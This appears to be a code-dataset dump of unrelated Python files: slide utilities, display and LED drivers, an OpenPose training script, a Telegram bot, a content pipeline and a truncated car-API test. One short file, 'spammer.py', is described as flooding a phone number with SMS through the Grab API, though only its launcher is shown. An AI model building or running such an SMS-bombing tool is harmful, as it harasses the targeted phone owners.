b4e6a18cfbf963e71640ed6cac3fc3a618a7ae15
|
[
"MIT"
] | 1 |
2021-11-04T17:06:07.000Z
|
2021-11-04T17:06:07.000Z
|
pyramid-creator/app/utils/slide_utils.py
|
JamesNeumann/learning-by-annotations
|
c2b5e4b653eeb1c973aa5a7dad35ac8be18cb1ad
|
[
"MIT"
] | 21 |
2021-11-01T10:13:56.000Z
|
2021-12-02T10:02:13.000Z
|
pyramid-creator/app/utils/slide_utils.py
|
jinnn-dev/patholearn
|
b4e6a18cfbf963e71640ed6cac3fc3a618a7ae15
|
[
"MIT"
] | 1 |
2021-12-16T18:20:55.000Z
|
2021-12-16T18:20:55.000Z
|
import base64
import os
from typing import Any, Dict, List, Tuple
from app.schemas.slide import Slide
def convert_binary_to_base64(binary_data: bytes):
"""
Converts bytes to base64
:param binary_data: Data to convert
:return: The data in base64
"""
return base64.b64encode(binary_data)
def is_byte_data(data: Any):
"""
Checks if the given data is of type byte
:param data: The data to check
:return: Whether the data is of type bytes or not
"""
return type(data) is bytes
def convert_slide_binary_metadata_to_base64(slide: Slide) -> Slide:
"""
Converts all binary data contained in the slide metadata to base64
"""
if slide.metadata is not None:
for metadata_key, metadata_value in slide.metadata.items():
if is_byte_data(metadata_value):
slide.metadata[metadata_key] = convert_binary_to_base64(metadata_value)
return slide
def convert_binary_metadata_to_base64(slides: List[Slide]) -> List[Slide]:
"""
Converts all binary data contained in the slide metadata to base64
:param slides: The slides to convert the metadata from
:return: The slides without binary metadata
"""
for slide in slides:
if slide.metadata is not None:
for metadata_key, metadata_value in slide.metadata.items():
if is_byte_data(metadata_value):
slide.metadata[metadata_key] = convert_binary_to_base64(
metadata_value
)
return slides
def openslide_can_load(file_extension: str) -> bool:
"""
Checks if the given file extension can be loaded by openslide.
:param file_extension: The file extension should be checked
:return: If the file extension can be loaded by openslide or not
"""
OPENSLIDE_FORMATS = [
"svs",
"tif",
"vms",
"vmu",
"ndpi",
"scn",
"mrxs",
"tiff",
"svslide",
"bif",
]
return file_extension.lower() in OPENSLIDE_FORMATS
def get_file_name_and_file_extension(file_name_with_extension: str) -> Tuple[str, str]:
"""
Splits the extension of the file name
    :param file_name_with_extension: file name with extension
:return: file name and file extension
"""
return os.path.splitext(file_name_with_extension)
def remove_truth_values_from_dict(
dict_to_be_filtered: Dict[Any, Any]
) -> Dict[Any, Any]:
"""
    Removes all entries in the given dict which have a truthy value
    :param dict_to_be_filtered: dict to filter
    :return: Filtered dict
"""
query = {}
if dict_to_be_filtered:
for key in dict_to_be_filtered:
if not dict_to_be_filtered[key]:
query[key] = dict_to_be_filtered[key]
return query
def delete_keys_from_dict(dict_del: Dict, keys_to_delete: List[str]) -> Dict:
"""
    Deletes the given keys from the given dict
:param dict_del: dict to delete keys from
:param keys_to_delete: All Keys that should be deleted
:return: The dict without the deleted keys
"""
for k in keys_to_delete:
try:
del dict_del[k]
except KeyError:
pass
for v in dict_del.values():
if isinstance(v, dict):
delete_keys_from_dict(v, keys_to_delete)
return dict_del
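# Hedged usage sketch (illustrative; the module only runs inside the app
# because of the Slide import above):
# cleaned = delete_keys_from_dict({"a": 1, "b": {"secret": 2}}, ["secret"])
# assert cleaned == {"a": 1, "b": {}}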
| 28.121951 | 88 | 0.625903 |
3a8dccd4067fa93ab125ce3063cd8685da4e8522
| 252 |
py
|
Python
|
retro/cores/gba/src/platform/python/cinema/util.py
|
MatPoliquin/retro
|
c70c174a9818d1e97bc36e61abb4694d28fc68e1
|
[
"MIT-0",
"MIT"
] | 2,706 |
2018-04-05T18:28:50.000Z
|
2022-03-29T16:56:59.000Z
|
retro/cores/gba/src/platform/python/cinema/util.py
|
MatPoliquin/retro
|
c70c174a9818d1e97bc36e61abb4694d28fc68e1
|
[
"MIT-0",
"MIT"
] | 242 |
2018-04-05T22:30:42.000Z
|
2022-03-19T01:55:11.000Z
|
retro/cores/gba/src/platform/python/cinema/util.py
|
MatPoliquin/retro
|
c70c174a9818d1e97bc36e61abb4694d28fc68e1
|
[
"MIT-0",
"MIT"
] | 464 |
2018-04-05T19:10:34.000Z
|
2022-03-28T13:33:32.000Z
|
def dictMerge(a, b):
for key, value in b.items():
if isinstance(value, dict):
if key in a:
dictMerge(a[key], value)
else:
a[key] = dict(value)
else:
a[key] = value
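# Hedged usage sketch (illustrative; not part of the original core file):
if __name__ == "__main__":
    base = {"video": {"scale": 1}, "audio": True}
    dictMerge(base, {"video": {"filter": "none"}, "audio": False})
    assert base == {"video": {"scale": 1, "filter": "none"}, "audio": False}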
| 25.2 | 40 | 0.436508 |
c95e36268fee4f635fdeff040e5f9871c8981a24
| 5,090 |
py
|
Python
|
MAIN/STM32F405_C/NORMAL/history/V28/display.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
MAIN/STM32F405_C/NORMAL/history/V28/display.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
MAIN/STM32F405_C/NORMAL/history/V28/display.py
|
ozturkahmetcevdet/VSenst
|
07c068fefcbd66ae4d8ec0480b4da10d6b5c7410
|
[
"MIT"
] | null | null | null |
from micropython import const
from pyb import UART
import utime
import register
LCD_COM_SPEED = const(921600)
LCD_COM_PORT = const(3)
class LCDCommand:
class Page:
Buffer = str()
Backup = str()
Repeat = False
Headline = "P."
Entry = "1" #Page 0_1
Main = "2" #Page_1
Bye = "3" #Page_Bye
Alarm = "4" #Page_Alarm
def ClearBuffer(self):
self.Backup = str()
class Ignition:
Buffer = str()
Backup = str()
Repeat = False
Headline = "I."
On = "1" #Ignition_On
Off = "2" #Ignition_Off
def ClearBuffer(self):
self.Backup = str()
class Seat:
NumberOfSeats = register.MAX_SEAT_NUMBER
Buffer = [str()] * NumberOfSeats
Backup = [str()] * NumberOfSeats
Repeat = False
Headline = "S."
Saved = "1" #Seat_Ok
Unregistered = "2" #Seat_Unregistered
Registered = "3" #Seat_Registered
Full = "4" #Seat_Red
FullWithSeatBeltAttached = "5" #Seat_Green
BlankWithSeatBeltAttached = "6" #Seat_Yellow
PadError = "7" #Seat_Fault
HubError = "8" #Seat_Fault
PadShortCircuit = "9" #Seat_Fault
def ClearBuffer(self):
self.Backup = [str()] * self.NumberOfSeats
class Counters:
Buffer = str()
Backup = str()
Repeat = False
Headline = "C."
Default = 1 #C0-25
def ClearBuffer(self):
self.Backup = str()
class Record:
Buffer = str()
Backup = str()
Repeat = False
Headline = "R."
Default = "1" #Mode_Null
RecordMode = "2" #Mode_Record
Services = "3" #Mode_Service
def ClearBuffer(self):
self.Backup = str()
class Instructions:
Buffer = str()
Backup = str()
Repeat = False
Headline = "L."
Sleep = "0"
WakeUp = "1"
def ClearBuffer(self):
self.Backup = str()
def ClearAllBuffer(self):
LCDCommand.Page.ClearBuffer(LCDCommand.Page)
LCDCommand.Ignition.ClearBuffer(LCDCommand.Ignition)
LCDCommand.Seat.ClearBuffer(LCDCommand.Seat)
LCDCommand.Counters.ClearBuffer(LCDCommand.Counters)
LCDCommand.Record.ClearBuffer(LCDCommand.Record)
class Display():
def __init__(self):
super().__init__()
self.Setup()
def Setup(self):
self.UART = UART(LCD_COM_PORT, LCD_COM_SPEED)
def Process(self):
self.Instructions()
self.Page()
self.Ignition()
self.Seat()
self.Counters()
self.Record()
def Instructions(self):
if (LCDCommand.Instructions.Buffer != LCDCommand.Instructions.Backup) or LCDCommand.Instructions.Repeat:
self.SendCommand("{}{}".format(LCDCommand.Instructions.Headline, LCDCommand.Instructions.Buffer))
LCDCommand.Instructions.Backup = LCDCommand.Instructions.Buffer
def Page(self):
if (LCDCommand.Page.Buffer != LCDCommand.Page.Backup) or LCDCommand.Page.Repeat:
self.SendCommand("{}{}".format(LCDCommand.Page.Headline, LCDCommand.Page.Buffer))
LCDCommand.Page.Backup = LCDCommand.Page.Buffer
def Ignition(self):
if (LCDCommand.Ignition.Buffer != LCDCommand.Ignition.Backup) or LCDCommand.Ignition.Repeat:
self.SendCommand("{}{}".format(LCDCommand.Ignition.Headline, LCDCommand.Ignition.Buffer))
LCDCommand.Ignition.Backup = LCDCommand.Ignition.Buffer
def Seat(self):
for i in range(LCDCommand.Seat.NumberOfSeats):
if (LCDCommand.Seat.Buffer[i] != LCDCommand.Seat.Backup[i]) or LCDCommand.Seat.Repeat:
self.SendCommand("{}{}.{}".format(LCDCommand.Seat.Headline, i, LCDCommand.Seat.Buffer[i]))
LCDCommand.Seat.Backup[i] = LCDCommand.Seat.Buffer[i]
def Counters(self):
if (LCDCommand.Counters.Buffer != LCDCommand.Counters.Backup) or LCDCommand.Counters.Repeat:
self.SendCommand("{}{}".format(LCDCommand.Counters.Headline, LCDCommand.Counters.Buffer))
LCDCommand.Counters.Backup = LCDCommand.Counters.Buffer
def Record(self):
if (LCDCommand.Record.Buffer != LCDCommand.Record.Backup) or LCDCommand.Record.Repeat:
self.SendCommand("{}{}".format(LCDCommand.Record.Headline, LCDCommand.Record.Buffer))
LCDCommand.Record.Backup = LCDCommand.Record.Buffer
def SendCommand(self, buf=""):
try:
self.UART.write(buf)
self.NextionEndCommand()
except OSError as err:
print("OS error: {0}".format(err))
except ValueError:
print("Could not send data over UART.")
except:
print("Unexpected error!")
raise
def NextionEndCommand(self):
self.UART.write(b'\xff')
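# Hedged usage sketch (illustrative; assumes a board where UART(3) is wired to
# the Nextion display):
# display = Display()
# LCDCommand.Page.Buffer = LCDCommand.Page.Main
# LCDCommand.Ignition.Buffer = LCDCommand.Ignition.On
# display.Process()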
| 32.83871 | 112 | 0.582122 |
2821431eafdeea45b18a5b97332139b738202dbe
| 895 |
py
|
Python
|
speakerphat/speakerphatled.py
|
gbesancon/projects
|
7a9da629dddcf21fbe5c043d86b00036f80cbe14
|
[
"MIT"
] | null | null | null |
speakerphat/speakerphatled.py
|
gbesancon/projects
|
7a9da629dddcf21fbe5c043d86b00036f80cbe14
|
[
"MIT"
] | 1 |
2022-03-02T10:43:58.000Z
|
2022-03-02T10:43:58.000Z
|
speakerphat/speakerphatled.py
|
gbesancon/projects
|
7a9da629dddcf21fbe5c043d86b00036f80cbe14
|
[
"MIT"
] | null | null | null |
# Updated from:
# git clone https://github.com/pimoroni/speaker-phat.git
# speaker-phat/python/speakerphat.py
import atexit
from sys import exit
try:
import sn3218
except ImportError:
exit("This library requires the sn3218 module\nInstall with: sudo pip install sn3218")
stupid_led_mappings = [0, 1, 2, 4, 6, 8, 10, 12, 14, 16]
led_values = [0 for x in range(18)]
enable_leds = 0
WIDTH = 10
HEIGHT = 1
for x in stupid_led_mappings:
enable_leds |= 1 << x
sn3218.enable_leds(enable_leds)
sn3218.enable()
def clear():
global led_values
led_values = [0 for x in range(18)]
show()
def set_led(index, value):
led_values[stupid_led_mappings[index]] = value
def set_leds(values):
for index in range(len(values)):
set_led(index, values[index])
def show():
sn3218.output(led_values)
atexit.register(clear)
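# Hedged usage sketch (illustrative; assumes a Speaker pHAT with the sn3218
# driver wired up):
# set_leds([255] * WIDTH)  # light the full 10-LED bar
# show()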
| 20.340909 | 91 | 0.670391 |
282d111aa47b111e35f16fa964919249981c16d2
| 10,270 |
py
|
Python
|
official/cv/openpose/modelarts/train_start.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 77 |
2021-10-15T08:32:37.000Z
|
2022-03-30T13:09:11.000Z
|
official/cv/openpose/modelarts/train_start.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 3 |
2021-10-30T14:44:57.000Z
|
2022-02-14T06:57:57.000Z
|
official/cv/openpose/modelarts/train_start.py
|
leelige/mindspore
|
5199e05ba3888963473f2b07da3f7bca5b9ef6dc
|
[
"Apache-2.0"
] | 24 |
2021-10-15T08:32:45.000Z
|
2022-03-24T18:45:20.000Z
|
# Copyright 2021 Huawei Technologies Co., Ltd
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ============================================================================
import os
import argparse
import glob
from ast import literal_eval as liter
from mindspore import Tensor
from mindspore import context
from mindspore import export
from mindspore.common import set_seed
from mindspore.context import ParallelMode
from mindspore.communication.management import init
from mindspore.train import Model
from mindspore.train.callback import ModelCheckpoint, CheckpointConfig, TimeMonitor
from mindspore.nn.optim import Adam, Momentum
from mindspore.train.loss_scale_manager import FixedLossScaleManager
from mindspore.train.serialization import load_checkpoint, load_param_into_net
from src.dataset import create_dataset
from src.openposenet import OpenPoseNet
from src.loss import openpose_loss, BuildTrainNetwork, TrainOneStepWithClipGradientCell
from src.utils import get_lr, MyLossMonitor
from src.model_utils.config import config
from src.model_utils.device_adapter import get_rank_id, get_device_num
import moxing as mox
import numpy as np
parser = argparse.ArgumentParser(description='Object detection')
parser.add_argument('--data_url',
metavar='DIR',
default='/cache/data_url',
help='path to dataset')
parser.add_argument('--train_url',
default="/cache/output/",
type=str,
help="setting dir of training output")
parser.add_argument('--vgg_path',
default="",
type=str,
help="vgg path")
parser.add_argument('--imgpath_train',
default="imgpath/train2017",
type=str,
help="image path")
parser.add_argument('--jsonpath_train',
default="jsonpath/person_keypoints_train2017.json",
type=str,
help="json path")
parser.add_argument('--maskpath_train',
default="maskpath/ignore_train2017",
type=str,
help="mask path")
parser.add_argument('--max_epoch_train',
default="2",
type=int,
help="max_epoch_train")
parser.add_argument('--warmup_epoch',
default="1",
type=int,
help="warmup_epoch")
parser.add_argument('--batch_size',
default="128",
type=int,
help="batch_size")
args_opt = parser.parse_args()
set_seed(1)
def frozen_to_air(net_f, args):
param_dict = load_checkpoint(args.get("ckpt_file"))
load_param_into_net(net_f, param_dict)
input_arr = Tensor(np.zeros([args.get("batch_size"), 3, args.get("height"), args.get("width")], np.float32))
    export(net_f, input_arr, file_name=args.get("file_name"), file_format=args.get("file_format"))
if __name__ == "__main__":
if not os.path.exists(config.data_path):
os.makedirs(config.data_path, exist_ok=True)
if not os.path.exists(config.output_path):
os.makedirs(config.output_path, exist_ok=True)
mox.file.copy_parallel(args_opt.data_url, config.data_path)
config.imgpath_train = os.path.join("/cache/data/", args_opt.imgpath_train)
config.jsonpath_train = os.path.join("/cache/data/", args_opt.jsonpath_train)
config.maskpath_train = os.path.join("/cache/data/", args_opt.maskpath_train)
config.max_epoch_train = args_opt.max_epoch_train
config.warmup_epoch = args_opt.warmup_epoch
config.batch_size = args_opt.batch_size
if args_opt.vgg_path:
config.vgg_path = os.path.join("/cache/data/", args_opt.vgg_path)
context.set_context(mode=context.GRAPH_MODE, device_target="Ascend", save_graphs=False)
config.lr = liter(config.lr)
config.outputs_dir = config.save_model_path
device_num = get_device_num()
if device_num > 1:
init()
context.set_auto_parallel_context(device_num=device_num, parallel_mode=ParallelMode.DATA_PARALLEL,
gradients_mean=True)
config.rank = get_rank_id()
config.outputs_dir = os.path.join(config.outputs_dir, "ckpt_{}/".format(config.rank))
else:
config.outputs_dir = os.path.join(config.outputs_dir, "ckpt_0/")
config.rank = 0
if device_num > 1:
config.max_epoch = config.max_epoch_train_NP
config.loss_scale = config.loss_scale / 2
config.lr_steps = list(map(int, config.lr_steps_NP.split(',')))
config.train_type = config.train_type_NP
config.optimizer = config.optimizer_NP
config.group_params = config.group_params_NP
else:
config.max_epoch = config.max_epoch_train
config.loss_scale = config.loss_scale
config.lr_steps = list(map(int, config.lr_steps.split(',')))
# create network
print('start create network')
criterion = openpose_loss()
criterion.add_flags_recursive(fp32=True)
network = OpenPoseNet(vggpath=config.vgg_path)
train_net = BuildTrainNetwork(network, criterion)
# create dataset
if os.path.exists(config.jsonpath_train) and os.path.exists(config.imgpath_train) \
and os.path.exists(config.maskpath_train):
print('start create dataset')
else:
raise ValueError('Error: wrong data path.')
num_worker = 20 if device_num > 1 else 48
de_dataset_train = create_dataset(config.jsonpath_train, config.imgpath_train, config.maskpath_train,
batch_size=config.batch_size,
rank=config.rank,
group_size=device_num,
num_worker=num_worker,
multiprocessing=True,
shuffle=True,
repeat_num=1)
steps_per_epoch = de_dataset_train.get_dataset_size()
print("steps_per_epoch: ", steps_per_epoch)
# lr scheduler
lr_stage, lr_base, lr_vgg = get_lr(config.lr * device_num,
config.lr_gamma,
steps_per_epoch,
config.max_epoch,
config.lr_steps,
device_num,
lr_type=config.lr_type,
warmup_epoch=config.warmup_epoch)
# optimizer
if config.group_params:
vgg19_base_params = list(filter(lambda x: 'base.vgg_base' in x.name, train_net.trainable_params()))
base_params = list(filter(lambda x: 'base.conv' in x.name, train_net.trainable_params()))
stages_params = list(filter(lambda x: 'base' not in x.name, train_net.trainable_params()))
group_params = [{'params': vgg19_base_params, 'lr': lr_vgg},
{'params': base_params, 'lr': lr_base},
{'params': stages_params, 'lr': lr_stage}]
if config.optimizer == "Momentum":
opt = Momentum(group_params, learning_rate=lr_stage, momentum=0.9)
elif config.optimizer == "Adam":
opt = Adam(group_params)
else:
raise ValueError("optimizer not support.")
else:
if config.optimizer == "Momentum":
opt = Momentum(train_net.trainable_params(), learning_rate=lr_stage, momentum=0.9)
elif config.optimizer == "Adam":
opt = Adam(train_net.trainable_params(), learning_rate=lr_stage)
else:
raise ValueError("optimizer not support.")
# callback
config_ck = CheckpointConfig(save_checkpoint_steps=config.ckpt_interval,
keep_checkpoint_max=config.keep_checkpoint_max)
ckpoint_cb = ModelCheckpoint(prefix=f"openpose-train-rank{config.rank}", directory=config.outputs_dir,
config=config_ck)
time_cb = TimeMonitor(data_size=de_dataset_train.get_dataset_size())
if config.rank == 0:
callback_list = [MyLossMonitor(), time_cb, ckpoint_cb]
else:
callback_list = [MyLossMonitor(), time_cb]
# train
if config.train_type == 'clip_grad':
train_net = TrainOneStepWithClipGradientCell(train_net, opt, sens=config.loss_scale)
train_net.set_train()
model = Model(train_net)
elif config.train_type == 'fix_loss_scale':
loss_scale_manager = FixedLossScaleManager(config.loss_scale, drop_overflow_update=False)
train_net.set_train()
model = Model(train_net, optimizer=opt, loss_scale_manager=loss_scale_manager)
else:
raise ValueError("Type {} is not support.".format(config.train_type))
print("============== Starting Training ==============")
model.train(config.max_epoch, de_dataset_train, callbacks=callback_list,
dataset_sink_mode=False)
ckpt_list = glob.glob(config.outputs_dir + "/openpose*.ckpt")
    if not ckpt_list:
        raise RuntimeError("ckpt file not generated.")
ckpt_list.sort(key=os.path.getmtime)
ckpt_model = ckpt_list[-1]
print("checkpoint path", ckpt_model)
net = OpenPoseNet(vggpath=config.vgg_path)
frozen_to_air_args = {'ckpt_file': ckpt_model,
'batch_size': 1,
'height': 368,
'width': 368,
'file_name': config.outputs_dir + '/openpose',
'file_format': 'AIR'}
frozen_to_air(net, frozen_to_air_args)
mox.file.copy_parallel(config.outputs_dir, args_opt.train_url)
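# Hedged invocation sketch (illustrative; all argument values below are
# placeholders, not verified paths):
# python train_start.py --data_url=/cache/data_url --train_url=/cache/output/ \
#     --max_epoch_train=2 --warmup_epoch=1 --batch_size=128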
| 42.970711 | 112 | 0.630088 |
25181fdb9f6efc5700c1cd156c8eb548c49cdefe
| 209 |
py
|
Python
|
examples/01 hello/Bot.py
|
Killerhaschen/marvin-telegram-bot
|
c65e890a00450ed6ed4312d93e259db0c080ef6d
|
[
"MIT"
] | 1 |
2020-01-16T08:40:00.000Z
|
2020-01-16T08:40:00.000Z
|
examples/01 hello/Bot.py
|
Killerhaschen/marvin-telegram-bot
|
c65e890a00450ed6ed4312d93e259db0c080ef6d
|
[
"MIT"
] | null | null | null |
examples/01 hello/Bot.py
|
Killerhaschen/marvin-telegram-bot
|
c65e890a00450ed6ed4312d93e259db0c080ef6d
|
[
"MIT"
] | 1 |
2019-10-16T08:11:51.000Z
|
2019-10-16T08:11:51.000Z
|
from samt import Bot
bot = Bot()
@bot.answer("Hello")
@bot.answer("/start")
@bot.answer("Hallo")
def start():
return "Hello, new user, how can I help you?"
if __name__ == "__main__":
bot.listen()
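# Hedged extension sketch (not in the original example; assumes samt's answer
# decorator treats any literal message the same way as the handlers above):
# @bot.answer("Bye")
# def bye():
#     return "Goodbye!"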
| 13.933333 | 49 | 0.631579 |
c29e708e86c49f9855aad0a25240296cc438dadc
| 313 |
py
|
Python
|
module/spammer.py
|
Goodhand11/Spamer
|
80e7d44e13417e2eebb14c57653dd6c17d351064
|
[
"Apache-2.0"
] | null | null | null |
module/spammer.py
|
Goodhand11/Spamer
|
80e7d44e13417e2eebb14c57653dd6c17d351064
|
[
"Apache-2.0"
] | null | null | null |
module/spammer.py
|
Goodhand11/Spamer
|
80e7d44e13417e2eebb14c57653dd6c17d351064
|
[
"Apache-2.0"
] | null | null | null |
# - Spammer v1
# | Description: spams a phone number by sending it a lot of sms by using Grab API
# | Author: P4kL0nc4t
# | Date: 5/12/2017
# | Disclaimer: Editing author will not make you the real coder
import spammer_class
spammer = spammer_class.Spammer()
spammer.author = "P4kL0nc4t"
spammer.main()
| 31.3 | 83 | 0.71885 |
6c3d2d29a6ac823d883558f4bb30a9c51f532846
| 6,903 |
py
|
Python
|
oldp/apps/backend/processing/content_processor.py
|
ImgBotApp/oldp
|
575dc6f711dde3470d910e21c9440ee9b79a69ed
|
[
"MIT"
] | 3 |
2020-06-27T08:19:35.000Z
|
2020-12-27T17:46:02.000Z
|
oldp/apps/backend/processing/content_processor.py
|
ImgBotApp/oldp
|
575dc6f711dde3470d910e21c9440ee9b79a69ed
|
[
"MIT"
] | null | null | null |
oldp/apps/backend/processing/content_processor.py
|
ImgBotApp/oldp
|
575dc6f711dde3470d910e21c9440ee9b79a69ed
|
[
"MIT"
] | null | null | null |
import glob
import logging.config
import os
from enum import Enum
from django.conf import settings
from oldp.apps.backend.processing import ProcessingError
from oldp.apps.backend.processing.processing_steps import BaseProcessingStep
ContentStorage = Enum('ContentStorage', 'ES FS DB')
logger = logging.getLogger(__name__)
class InputHandler(object):
input_selector = None # Can be single, list, ... depends on get_content
input_limit = 0 # 0 = unlimited
input_start = 0
pre_processed_content = []
def __init__(self, limit=0, start=0, selector=None):
self.input_limit = limit
self.input_selector = selector
self.input_start = start
def handle_input(self, input_content) -> None:
raise NotImplementedError()
def get_input(self) -> list:
raise NotImplementedError()
class InputHandlerFS(InputHandler):
"""Read content files for initial processing from file system"""
dir_selector = '/*'
def get_input_content_from_selector(self, selector) -> list:
content = []
if isinstance(selector, str):
if os.path.isdir(selector):
# Get all files recursive
content.extend(sorted(file for file in glob.glob(selector + self.dir_selector, recursive=True)))
elif os.path.isfile(selector):
# Selector is specific file
content.append(selector)
elif isinstance(selector, list):
# List of selectors
for s in selector:
content.extend(self.get_input_content_from_selector(s))
return content
def get_input(self) -> list:
"""Select files from input_selector recursively and from directory with dir_selector """
if self.input_selector is None:
raise ProcessingError('input_selector is not set')
content_list = self.get_input_content_from_selector(self.input_selector)[self.input_start:]
if len(content_list) < 1:
raise ProcessingError('Input selector is empty: %s' % self.input_selector)
if self.input_limit > 0:
content_list = content_list[:self.input_limit]
return content_list
def handle_input(self, input_content: str) -> None:
raise NotImplementedError()
class ContentProcessor(object):
"""Base class for content processing pipeline
Methods are called in the following order:
1. get_input: returns list of input objects (fs: file path, db: model instance)
- fs: set_input: list of dirs or files
- db: set_input: db.queryset
2. handle_input: handles input objects and transforms them to processing objects (fs: file path > model instance
+ save instance, db: keep model instance); write to self.pre_processed_content
3. process: iterate over all processing steps (model instance > model instance), save processed model (in db
+ self.processed_content)
4. post_process: iterate over all post processing steps (e.g. write to ES)
"""
working_dir = os.path.join(settings.BASE_DIR, 'workingdir')
input_handler = None # type: InputHandler
processed_content = []
pre_processed_content = []
processing_steps = []
post_processing_steps = []
# Errors
pre_processing_errors = []
post_processing_errors = []
processing_errors = []
# Storage
# output_path = 'http://localhost:9200'
# DB settings (Django db models to be deleted on setup)
# db_models = []
# Stats
file_counter = 0
file_failed_counter = 0
doc_counter = 0
doc_failed_counter = 0
def __init__(self):
# Working dir
pass
@staticmethod
def set_parser_arguments(parser):
# Enable arguments that are used by all children
parser.add_argument('--verbose', action='store_true', default=False)
def set_options(self, options):
# Set options according to parser options
# self.output_path = options['output']
if options['verbose']:
logger.setLevel(logging.DEBUG)
def empty_content(self):
raise NotImplementedError()
def set_input_handler(self, handler: InputHandler):
self.input_handler = handler
def call_processing_steps(self, content):
for step in self.processing_steps: # type: BaseProcessingStep
try:
content = step.process(content)
except ProcessingError as e:
logger.error('Failed to call processing step (%s): %s' % (step, e))
self.processing_errors.append(e)
return content
def process(self):
# Reset queues
self.pre_processed_content = []
self.processed_content = []
# Separate input handling and processing (processing needs to access previous items)
for input_content in self.input_handler.get_input():
try:
self.input_handler.handle_input(input_content)
except ProcessingError as e:
logger.error('Failed to process content (%s): %s' % (input_content, e))
self.pre_processing_errors.append(e)
self.pre_processed_content = self.input_handler.pre_processed_content
logger.debug('Pre-processed content: %i' % len(self.pre_processed_content))
self.process_content()
# Call post processing steps (each with whole content queue)
for step in self.post_processing_steps:
try:
step.process(self.processed_content)
except ProcessingError as e:
logger.error('Failed to call post processing step (%s): %s' % (step, e))
self.post_processing_errors.append(e)
def process_content(self):
raise NotImplementedError("Child class instead to implement this method.")
def log_stats(self):
logger.info('Processing stats:')
logger.info('- Successful files: %i (failed: %i)' % (self.file_counter, self.file_failed_counter))
logger.info('- Successful documents: %i (failed: %i)' % (self.doc_counter, self.doc_failed_counter))
for step in self.post_processing_steps:
if hasattr(step, 'log_stats'):
step.log_stats()
if len(self.pre_processing_errors) > 0:
logger.warning('Pre-processing errors: %i' % len(self.pre_processing_errors))
logger.debug('Pre-processing errors: %s' % self.pre_processing_errors)
if len(self.processing_errors) > 0:
logger.warning('Processing errors: %i' % len(self.processing_errors))
logger.debug('Processing errors: %s' % self.processing_errors)
if len(self.post_processing_errors) > 0:
logger.warning('Post-processing errors: %i' % len(self.post_processing_errors))
logger.debug('Post-processing errors: %s' % self.post_processing_errors)
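# Hedged subclass sketch (illustrative, not part of the module): the minimal
# methods a concrete pipeline has to provide.
# class MyProcessor(ContentProcessor):
#     def empty_content(self):
#         pass
#     def process_content(self):
#         for item in self.pre_processed_content:
#             self.processed_content.append(self.call_processing_steps(item))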
| 34.343284 | 116 | 0.656961 |
dd9003ab0ee5a1422ecb9328b37e45da2d4620c7
| 25,679 |
py
|
Python
|
src/test_zoe.py
|
En3rGy/14106_Zoe
|
9273fca7775a5b6fc9a2f9c5411957083352ce4c
|
[
"MIT"
] | 1 |
2021-01-01T09:12:12.000Z
|
2021-01-01T09:12:12.000Z
|
src/test_zoe.py
|
En3rGy/14106_Zoe
|
9273fca7775a5b6fc9a2f9c5411957083352ce4c
|
[
"MIT"
] | 4 |
2020-12-23T23:04:09.000Z
|
2022-03-16T21:21:38.000Z
|
src/test_zoe.py
|
En3rGy/14106_Zoe
|
9273fca7775a5b6fc9a2f9c5411957083352ce4c
|
[
"MIT"
] | null | null | null |
# coding: UTF-8
import unittest
import time
# functional import
import urllib
import urllib2
import ssl
import threading
from datetime import datetime
import json
#########################################################
class hsl20_4:
LOGGING_NONE = 0
def __init__(self):
pass
class BaseModule:
        debug_output_value = {}  # type: dict
        debug_set_remanent = {}  # type: dict
debug_input_value = {}
def __init__(self, a, b):
pass
def _get_framework(self):
f = hsl20_4.Framework()
return f
def _get_logger(self, a, b):
return 0
def _get_remanent(self, key):
return 0
def _set_remanent(self, key, val):
self.debug_set_remanent = val
def _set_output_value(self, pin, value):
self.debug_output_value[int(pin)] = value
print "# Out: " + str(value) + " @ pin " + str(pin)
def _get_input_value(self, pin):
if pin in self.debug_input_value:
return self.debug_input_value[pin]
else:
return 0
class Framework:
def __init__(self):
pass
def _run_in_context_thread(self, a):
pass
def create_debug_section(self):
d = hsl20_4.DebugHelper()
return d
class DebugHelper:
def __init__(self):
pass
def set_value(self, cap, text):
print("DEBUG value\t'" + str(cap) + "': " + str(text))
def add_message(self, msg):
print("Debug Msg\t" + str(msg))
def add_exception(self, msg):
print("EXCEPTION Msg\t" + str(msg))
#########################################################
##!!!!##################################################################################################
#### Own written code can be placed above this commentblock . Do not change or delete commentblock! ####
########################################################################################################
##** Code created by generator - DO NOT CHANGE! **##
class Zoe_14106_14106(hsl20_4.BaseModule):
def __init__(self, homeserver_context):
hsl20_4.BaseModule.__init__(self, homeserver_context, "14106_Zoe")
self.FRAMEWORK = self._get_framework()
self.LOGGER = self._get_logger(hsl20_4.LOGGING_NONE,())
self.PIN_I_S_USER=1
self.PIN_I_S_PW=2
self.PIN_I_S_VIN=3
self.PIN_I_N_ZOEMODEL=4
self.PIN_I_N_INTERVAL=5
self.PIN_I_N_TRIGGER=6
self.PIN_I_N_AC=7
self.PIN_I_N_CHARGE=8
self.PIN_O_S_CARPICTURE=1
self.PIN_O_N_BATTERYLEVEL=2
self.PIN_O_N_BATTERYAUTONOMY=3
self.PIN_O_N_BATTERYAVAILABLEENERGY=4
self.PIN_O_N_BATTERYTEMPERATURE=5
self.PIN_O_N_PLUGSTATUS=6
self.PIN_O_N_CHARGESTATUS=7
self.PIN_O_N_TOTALMILEAGE=8
self.PIN_O_N_GPSLATITUDE=9
self.PIN_O_N_GPSLONGITUDE=10
self.PIN_O_S_LASTUPDATETIME=11
self.PIN_O_N_ACFEEDBACK=12
########################################################################################################
#### Own written code can be placed after this commentblock . Do not change or delete commentblock! ####
###################################################################################################!!!##
# do not edit
g_kamareonURL = "https://api-wired-prod-1-euw1.wrd-aws.com" # type: str
